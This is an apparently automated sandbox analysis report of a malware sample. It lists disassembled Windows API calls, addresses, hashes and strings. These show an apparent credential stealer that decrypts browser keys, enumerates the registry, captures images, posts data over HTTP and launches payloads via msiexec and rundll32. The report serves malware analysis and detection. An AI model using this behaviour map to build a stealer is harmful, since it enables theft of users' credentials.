                                                  • API ID: lstrlen$Internet$lstrcpy$??2@CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocateConnectCrackFileProcessReadSend
                                                  • String ID:
                                                  • API String ID: 1703137719-0
                                                  • Opcode ID: 953f36d5d89b78922954f70e89b18a367f9e390412a3d758b9e507f35f40a690
                                                  • Instruction ID: b35fe3c464a53555783ee1ac5c60cd24fcd8bf8935b04e2ed4b86f30a75221fc
                                                  • Opcode Fuzzy Hash: 953f36d5d89b78922954f70e89b18a367f9e390412a3d758b9e507f35f40a690
                                                  • Instruction Fuzzy Hash: F912DE72950228ABCB15EBA0DD95FEEB3B9BF15701F6041D9B146720A1EF702B88CF51
                                                  APIs
                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0086A368,00000000,?,0042144C,00000000,?,?), ref: 0040CA6C
                                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040CA89
                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 0040CA95
                                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040CAA8
                                                  • ??2@YAPAXI@Z.MSVCRT(-00000001), ref: 0040CAB5
                                                  • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040CAD9
                                                  • StrStrA.SHLWAPI(?,0086A3F8,00420B52), ref: 0040CAF7
                                                  • StrStrA.SHLWAPI(00000000,0086A410), ref: 0040CB1E
                                                  • StrStrA.SHLWAPI(?,0086AFB8,00000000,?,00421458,00000000,?,00000000,00000000,?,00867160,00000000,?,00421454,00000000,?), ref: 0040CCA2
                                                  • StrStrA.SHLWAPI(00000000,0086B118), ref: 0040CCB9
                                                    • Part of subcall function 0040C820: memset.MSVCRT ref: 0040C853
                                                    • Part of subcall function 0040C820: lstrlenA.KERNEL32(?,00000001,?,00000000,00000000,00000000,00000000,?,00867180), ref: 0040C871
                                                    • Part of subcall function 0040C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0040C87C
                                                    • Part of subcall function 0040C820: memcpy.MSVCRT(?,?,?), ref: 0040C912
                                                  • StrStrA.SHLWAPI(?,0086B118,00000000,?,0042145C,00000000,?,00000000,00867180), ref: 0040CD5A
                                                  • StrStrA.SHLWAPI(00000000,00866F80), ref: 0040CD71
                                                    • Part of subcall function 0040C820: lstrcatA.KERNEL32(?,00420B46), ref: 0040C943
                                                    • Part of subcall function 0040C820: lstrcatA.KERNEL32(?,00420B47), ref: 0040C957
                                                    • Part of subcall function 0040C820: lstrcatA.KERNEL32(?,00420B4E), ref: 0040C978
                                                  • lstrlenA.KERNEL32(00000000), ref: 0040CE44
                                                  • CloseHandle.KERNEL32(00000000), ref: 0040CE9C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585045008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1585045008.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$??2@BinaryCloseCreateCryptHandleReadSizeStringmemcpymemset
                                                  • String ID:
                                                  • API String ID: 3555725114-3916222277
                                                  • Opcode ID: bdcf7920c9ab84c4787d47d5031650711a85c06ed1b0856f23742556519dcaf9
                                                  • Instruction ID: fb2464dfdb87d028b9341c66972094ccea7bc9213c5b9a6eafc00a4a54def107
                                                  • Opcode Fuzzy Hash: bdcf7920c9ab84c4787d47d5031650711a85c06ed1b0856f23742556519dcaf9
                                                  • Instruction Fuzzy Hash: 2FE13E71911108ABCB14FBA1DC91FEEB779AF14314F40416EF10673191EF386A9ACB6A
                                                  APIs
                                                    • Part of subcall function 00B3A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B3A9EF
                                                    • Part of subcall function 00B3AB87: lstrcpy.KERNEL32(00000000,?), ref: 00B3ABD9
                                                    • Part of subcall function 00B3AB87: lstrcat.KERNEL32(00000000), ref: 00B3ABE9
                                                    • Part of subcall function 00B3AB07: lstrcpy.KERNEL32(?,00420E17), ref: 00B3AB6C
                                                    • Part of subcall function 00B3AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 00B3AC2C
                                                    • Part of subcall function 00B3AC17: lstrcpy.KERNEL32(00000000), ref: 00B3AC6B
                                                    • Part of subcall function 00B3AC17: lstrcat.KERNEL32(00000000,00000000), ref: 00B3AC79
                                                  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0064A63C,00000000,?,0042144C,00000000,?,?), ref: 00B2CCD3
                                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00B2CCF0
                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 00B2CCFC
                                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00B2CD0F
                                                  • ??2@YAPAXI@Z.MSVCRT(-00000001), ref: 00B2CD1C
                                                  • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00B2CD40
                                                  • StrStrA.SHLWAPI(?,0064A1B0,00420B52), ref: 00B2CD5E
                                                  • StrStrA.SHLWAPI(00000000,0064A364), ref: 00B2CD85
                                                  • StrStrA.SHLWAPI(?,0064A4D0,00000000,?,00421458,00000000,?,00000000,00000000,?,0064A15C,00000000,?,00421454,00000000,?), ref: 00B2CF09
                                                  • StrStrA.SHLWAPI(00000000,0064A4CC), ref: 00B2CF20
                                                    • Part of subcall function 00B2CA87: memset.MSVCRT ref: 00B2CABA
                                                    • Part of subcall function 00B2CA87: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00B2CAD8
                                                    • Part of subcall function 00B2CA87: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00B2CAE3
                                                    • Part of subcall function 00B2CA87: memcpy.MSVCRT(?,?,?), ref: 00B2CB79
                                                  • StrStrA.SHLWAPI(?,0064A4CC,00000000,?,0042145C,00000000,?,00000000,0064A0DC), ref: 00B2CFC1
                                                  • StrStrA.SHLWAPI(00000000,0064A5A8), ref: 00B2CFD8
                                                    • Part of subcall function 00B2CA87: lstrcat.KERNEL32(?,00420B46), ref: 00B2CBAA
                                                    • Part of subcall function 00B2CA87: lstrcat.KERNEL32(?,00420B47), ref: 00B2CBBE
                                                    • Part of subcall function 00B2CA87: lstrcat.KERNEL32(?,00420B4E), ref: 00B2CBDF
                                                  • lstrlen.KERNEL32(00000000), ref: 00B2D0AB
                                                  • CloseHandle.KERNEL32(00000000), ref: 00B2D103
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585492974.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b20000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$??2@BinaryCloseCreateCryptHandleReadSizeStringmemcpymemset
                                                  • String ID:
                                                  • API String ID: 3555725114-3916222277
                                                  • Opcode ID: 9842806969cad6799f0f7568e9bc81044bc23dbf52ae901b6399e5f6c005bae5
                                                  • Instruction ID: b77cf0ff4db214c715f219ee84ed5512e342b1029bc0843abd2cbf0f4a625d63
                                                  • Opcode Fuzzy Hash: 9842806969cad6799f0f7568e9bc81044bc23dbf52ae901b6399e5f6c005bae5
                                                  • Instruction Fuzzy Hash: 83E12272900208AFCB14EBA4DD91FEEB7B9AF15700F605199F146B31A1EF346A89CF51
                                                  APIs
                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                  • RegOpenKeyExA.ADVAPI32(00000000,00868138,00000000,00020019,00000000,004205B6), ref: 004183A4
                                                  • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00418426
                                                  • wsprintfA.USER32 ref: 00418459
                                                  • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0041847B
                                                  • RegCloseKey.ADVAPI32(00000000), ref: 0041848C
                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00418499
                                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585045008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1585045008.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseOpenlstrcpy$Enumwsprintf
                                                  • String ID: - $%s\%s$?
                                                  • API String ID: 3246050789-3278919252
                                                  • Opcode ID: 10eb0c450f8aa63e58ce6e2e13bbd26e49cdc9fd0544e95f6096289088943245
                                                  • Instruction ID: f03ee3f6de4a678c4a24becac03c3675d5d4362b87af83515ad79f9b006405b7
                                                  • Opcode Fuzzy Hash: 10eb0c450f8aa63e58ce6e2e13bbd26e49cdc9fd0544e95f6096289088943245
                                                  • Instruction Fuzzy Hash: B4813E75911118ABEB24DF50CD81FEAB7B9FF08714F008299E109A6180DF756BC6CFA5
                                                  APIs
                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                  • memset.MSVCRT ref: 00410C1C
                                                  • lstrcatA.KERNEL32(?,00000000), ref: 00410C35
                                                  • lstrcatA.KERNEL32(?,00420D7C), ref: 00410C47
                                                  • lstrcatA.KERNEL32(?,00000000), ref: 00410C5D
                                                  • lstrcatA.KERNEL32(?,00420D80), ref: 00410C6F
                                                  • lstrcatA.KERNEL32(?,00000000), ref: 00410C88
                                                  • lstrcatA.KERNEL32(?,00420D84), ref: 00410C9A
                                                  • lstrlenA.KERNEL32(?), ref: 00410CA7
                                                  • memset.MSVCRT ref: 00410CCD
                                                  • memset.MSVCRT ref: 00410CE1
                                                    • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,00867190,?,0042110C,?,00000000), ref: 0041A82B
                                                    • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                                    • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,00832A10,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                    • Part of subcall function 004196C0: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,00410B85,?,00000000,?,00000000,004205C6,004205C5), ref: 004196E1
                                                  • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000020,00000000,00000000,?,?,00000000,?,00420D88,?,00000000), ref: 00410D5A
                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00410D66
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585045008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1585045008.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcat$lstrcpy$lstrlenmemset$Create$FileObjectProcessSingleSystemTimeWait
                                                  • String ID: .exe
                                                  • API String ID: 1395395982-4119554291
                                                  • Opcode ID: 74a2b4eb823f66a7a773147b1627efd196d727e2fc86b427189f4ea67f13cdff
                                                  • Instruction ID: 8c4414bd7b792449c86a3c64e171a12ac7102eaeec46e1acf96b3d3d4dd6cf75
                                                  • Opcode Fuzzy Hash: 74a2b4eb823f66a7a773147b1627efd196d727e2fc86b427189f4ea67f13cdff
                                                  • Instruction Fuzzy Hash: A78194B55111186BCB14FBA1CD52FEE7338AF44308F40419EB30A66082DE786AD9CF6E
                                                  APIs
                                                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0041906C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585045008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1585045008.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateGlobalStream
                                                  • String ID: image/jpeg
                                                  • API String ID: 2244384528-3785015651
                                                  • Opcode ID: e883d83a5a88c000208a0b3536991fc9b742a1aee5e23c3149dc995228aa81a1
                                                  • Instruction ID: d6dc09ab2bfedf2d54b470b914d8c7211c5e4dd185e8bb692af35d1d417654b8
                                                  • Opcode Fuzzy Hash: e883d83a5a88c000208a0b3536991fc9b742a1aee5e23c3149dc995228aa81a1
                                                  • Instruction Fuzzy Hash: 7D711B75A40208BBDB04EFE4DC99FEEB7B9FB48300F108509F515A7290DB38A945CB65
                                                  APIs
                                                  • strtok_s.MSVCRT ref: 00411307
                                                  • strtok_s.MSVCRT ref: 00411750
                                                    • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,00867190,?,0042110C,?,00000000), ref: 0041A82B
                                                    • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585045008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1585045008.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: strtok_s$lstrcpylstrlen
                                                  • String ID:
                                                  • API String ID: 348468850-0
                                                  • Opcode ID: bde3d88e76cb374dc77a589280481c748b3d98596421ad73c644b27d853b8bc6
                                                  • Instruction ID: 4a233ae47f87f64f9a2ed81d2cca976e3c75948f423937a2df4e62cfbc7c3e06
                                                  • Opcode Fuzzy Hash: bde3d88e76cb374dc77a589280481c748b3d98596421ad73c644b27d853b8bc6
                                                  • Instruction Fuzzy Hash: C7C1D6B5941218ABCB14EF60DC89FEA7379BF54304F00449EF50AA7241DB78AAC5CF95
                                                  APIs
                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                  • ShellExecuteEx.SHELL32(0000003C), ref: 004131C5
                                                  • ShellExecuteEx.SHELL32(0000003C), ref: 0041335D
                                                  • ShellExecuteEx.SHELL32(0000003C), ref: 004134EA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585045008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1585045008.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExecuteShell$lstrcpy
                                                  • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                                                  • API String ID: 2507796910-3625054190
                                                  • Opcode ID: f416c3abd8d48d8571a1066b95692cbdeaad0712c422f8a8d0e8344c420d34f1
                                                  • Instruction ID: 17233f41fb1950bff335544576ea1941aa871c2d7c6c7a5a475621d351ca9112
                                                  • Opcode Fuzzy Hash: f416c3abd8d48d8571a1066b95692cbdeaad0712c422f8a8d0e8344c420d34f1
                                                  • Instruction Fuzzy Hash: 96125F718111089ADB09FBA1DD92FEEB778AF14314F50415EF10666091EF382BDACF6A
                                                  APIs
                                                  • memset.MSVCRT ref: 0041429E
                                                  • memset.MSVCRT ref: 004142B5
                                                    • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                                  • lstrcatA.KERNEL32(?,00000000), ref: 004142EC
                                                  • lstrcatA.KERNEL32(?,0086A8A8), ref: 0041430B
                                                  • lstrcatA.KERNEL32(?,?), ref: 0041431F
                                                  • lstrcatA.KERNEL32(?,0086A680), ref: 00414333
                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                    • Part of subcall function 00418D90: GetFileAttributesA.KERNEL32(00000000,?,00410117,?,00000000,?,00000000,00420DAB,00420DAA), ref: 00418D9F
                                                    • Part of subcall function 00409CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00409D39
                                                    • Part of subcall function 00409CE0: memcmp.MSVCRT(?,DPAPI,00000005), ref: 00409D92
                                                    • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                                    • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                                    • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                                    • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                                    • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                                                    • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                                    • Part of subcall function 004193C0: GlobalAlloc.KERNEL32(00000000,004143DD,004143DD), ref: 004193D3
                                                  • StrStrA.SHLWAPI(?,0086A830), ref: 004143F3
                                                  • GlobalFree.KERNEL32(?), ref: 00414512
                                                    • Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409AEF
                                                    • Part of subcall function 00409AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00404EEE,00000000,?), ref: 00409B01
                                                    • Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409B2A
                                                    • Part of subcall function 00409AC0: LocalFree.KERNEL32(?,?,?,?,00404EEE,00000000,?), ref: 00409B3F
                                                    • Part of subcall function 00409E10: memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D
                                                  • lstrcatA.KERNEL32(?,00000000), ref: 004144A3
                                                  • StrCmpCA.SHLWAPI(?,004208D1), ref: 004144C0
                                                  • lstrcatA.KERNEL32(00000000,00000000), ref: 004144D2
                                                  • lstrcatA.KERNEL32(00000000,?), ref: 004144E5
                                                  • lstrcatA.KERNEL32(00000000,00420FB8), ref: 004144F4
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585045008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1585045008.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1585045008.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalStringmemcmpmemset$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                                  • String ID:
                                                  • API String ID: 1191620704-0
                                                  • Opcode ID: 0c9d0826f05218bba3054023445b60d50c1f9f43ea0f6b816602f798d9ef3330
                                                  • Instruction ID: 36ee7f3ac4f34f2e69ac811a17adbc1f593ee72d5fdd25ff7e799b1d0bb6bc25
                                                  • Opcode Fuzzy Hash: 0c9d0826f05218bba3054023445b60d50c1f9f43ea0f6b816602f798d9ef3330
                                                  • Instruction Fuzzy Hash: 0B7165B6900208BBDB14FBE0DC85FEE7379AB88304F00459DF605A7181EA78DB55CB95
                                                  APIs
                                                  • memset.MSVCRT ref: 00B34505
                                                  • memset.MSVCRT ref: 00B3451C
                                                    • Part of subcall function 00B39047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00B39072
                                                  • lstrcat.KERNEL32(?,00000000), ref: 00B34553
                                                  • lstrcat.KERNEL32(?,0064A30C), ref: 00B34572
                                                  • lstrcat.KERNEL32(?,?), ref: 00B34586
                                                  • lstrcat.KERNEL32(?,0064A5D8), ref: 00B3459A
                                                    • Part of subcall function 00B3A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B3A9EF
                                                    • Part of subcall function 00B38FF7: GetFileAttributesA.KERNEL32(00000000,?,00B21DBB,?,?,0042565C,?,?,00420E1F), ref: 00B39006
                                                    • Part of subcall function 00B29F47: StrStrA.SHLWAPI(00000000,004212AC), ref: 00B29FA0
                                                    • Part of subcall function 00B29F47: memcmp.MSVCRT(?,0042125C,00000005), ref: 00B29FF9
                                                    • Part of subcall function 00B29C27: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00B29C53
                                                    • Part of subcall function 00B29C27: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00B29C78
                                                    • Part of subcall function 00B29C27: LocalAlloc.KERNEL32(00000040,?), ref: 00B29C98
                                                    • Part of subcall function 00B29C27: ReadFile.KERNEL32(000000FF,?,00000000,00B216F6,00000000), ref: 00B29CC1
                                                    • Part of subcall function 00B29C27: LocalFree.KERNEL32(00B216F6), ref: 00B29CF7
                                                    • Part of subcall function 00B29C27: CloseHandle.KERNEL32(000000FF), ref: 00B29D01
                                                    • Part of subcall function 00B39627: GlobalAlloc.KERNEL32(00000000,00B34644,00B34644), ref: 00B3963A
                                                  • StrStrA.SHLWAPI(?,0064A0D8), ref: 00B3465A
                                                  • GlobalFree.KERNEL32(?), ref: 00B34779
                                                    • Part of subcall function 00B29D27: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00B25155,00000000,00000000), ref: 00B29D56
                                                    • Part of subcall function 00B29D27: LocalAlloc.KERNEL32(00000040,?,?,?,00B25155,00000000,?), ref: 00B29D68
                                                    • Part of subcall function 00B29D27: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00B25155,00000000,00000000), ref: 00B29D91
                                                    • Part of subcall function 00B29D27: LocalFree.KERNEL32(?,?,?,?,00B25155,00000000,?), ref: 00B29DA6
                                                    • Part of subcall function 00B2A077: memcmp.MSVCRT(?,00421264,00000003), ref: 00B2A094
                                                  • lstrcat.KERNEL32(?,00000000), ref: 00B3470A
                                                  • StrCmpCA.SHLWAPI(?,004208D1), ref: 00B34727
                                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00B34739
                                                  • lstrcat.KERNEL32(00000000,?), ref: 00B3474C
                                                  • lstrcat.KERNEL32(00000000,00420FB8), ref: 00B3475B
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1585492974.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b20000_cdc57Mn7dE.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalStringmemcmpmemset$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                                  • String ID:
                                                  • API String ID: 1191620704-0
                                                  • Opcode ID: e8d6e6767f46891ec996ef8822d66cebf734f8a34e2b49da607d012598c1f812
                                                  • Instruction ID: 24341b310ceeee23cef13cc872ee22afcfe15281c5c347e2a6818ef9eb4ac133
                                                  • Opcode Fuzzy Hash: e8d6e6767f46891ec996ef8822d66cebf734f8a34e2b49da607d012598c1f812
                                                  • Instruction Fuzzy Hash: 5F7150B6900218BBDB14FBE0DC85FEE77B9AB49300F1085D8B609A6181EB75DB49CB51
                                                  APIs
                                                  • memset.MSVCRT ref: 00401327
                                                    • Part of subcall function 004012A0: GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 004012B4
                                                    • Part of subcall function 004012A0: HeapAlloc.KERNEL32(00000000), ref: 004012BB
                                                    • Part of subcall function 004012A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 004012D7
                                                    • Part of subcall function 004012A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012F5
                                                    • Part of subcall function 004012A0: RegCloseKey.ADVAPI32(?), ref: 004012FF
                                                  • lstrcatA.KERNEL32(?,00000000), ref: 0040134F
                                                  • lstrlenA.KERNEL32(?), ref: 0040135C
                                                  • lstrcatA.KERNEL32(?,.keys), ref: 00401377
                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
